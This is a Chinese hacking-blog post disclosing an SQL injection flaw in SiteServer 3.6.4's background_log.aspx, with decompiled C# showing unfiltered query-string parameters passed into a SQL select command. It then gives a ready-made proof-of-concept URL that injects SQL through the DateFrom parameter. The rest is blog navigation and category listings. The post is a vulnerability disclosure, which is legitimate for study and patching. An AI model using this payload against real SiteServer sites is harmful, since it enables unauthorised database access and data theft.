最新版siteserver3.6.4 sql注入漏洞

作者：qxz_xp 发布：2013-12-26 22:03 分类：黑客技术, 黑客攻防暂无评论

存在siteserver/platform/background_log.aspx

用.NET Reflector 反编译BaiRong.BackgroundPages.dll这个文件。

查看代码如下：

this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;

flag = base.Request.QueryString[“UserName”] != null;

if (!flag)

{

this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend();

}

else

{

this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(base.Request.QueryString[“UserName”], base.Request.QueryString[“Keyword”], base.Request.QueryString[“DateFrom”], base.Request.QueryString[“DateTo”]);

}

所有的参数都没有进行有效的过滤

http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101′%20and%20@@version=1%20and%201=’test&DateTo=test

原创文章转载请注明：转载自七行者博客

本文固定链接: https://www.qxzxp.com/4401.html

QQ空间微信腾讯微博新浪微博我的搜狐人人网天涯社区百度贴吧更多

【上一篇】报道称黑客已盗取塔吉特用户银行卡PIN码
【下一篇】使用systemtap抓取ssh登录的用户名和密码

您可能还会对这些文章感兴趣！

最新版siteserver3.6.4 sql注入漏洞：等您坐沙发呢！

发表评论

博客搜索

博客日历

2024年 4月
一	二	三	四	五	六	日
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30

博客目录

电脑维修 (22)
- 其它技术 (8)
- 台式机维修 (5)
- 显示器维修 (3)
- 电脑软件 (3)
- 笔记本维修 (4)
网站运营 (65)
- seo优化 (45)
- 新闻资讯 (3)
- 网上创业 (8)
- 网站建设 (10)
- 网站推广 (7)
网络安全 (89)
- 入侵检测 (6)
- 安全知识 (27)
- 最新资讯 (21)
- 漏洞公布 (35)
- 病毒预警 (8)
腾讯QQ (81)
- QQ个性签名 (10)
- QQ个性网名 (18)
- QQ头像 (45)
- QQ技术 (6)
- QQ空间 (4)
黑客攻防 (486)
- 业界新闻 (178)
- 社工相关 (27)
- 菜鸟入门 (119)
- 黑客工具 (105)
- 黑客技术 (139)

最新版siteserver3.6.4 sql注入漏洞

您可能还会对这些文章感兴趣！

最新版siteserver3.6.4 sql注入漏洞：等您坐沙发呢！

发表评论

博客搜索

博客日历

近期文章

归档

博客目录

云标签

最新日志热评日志随机日志

近期评论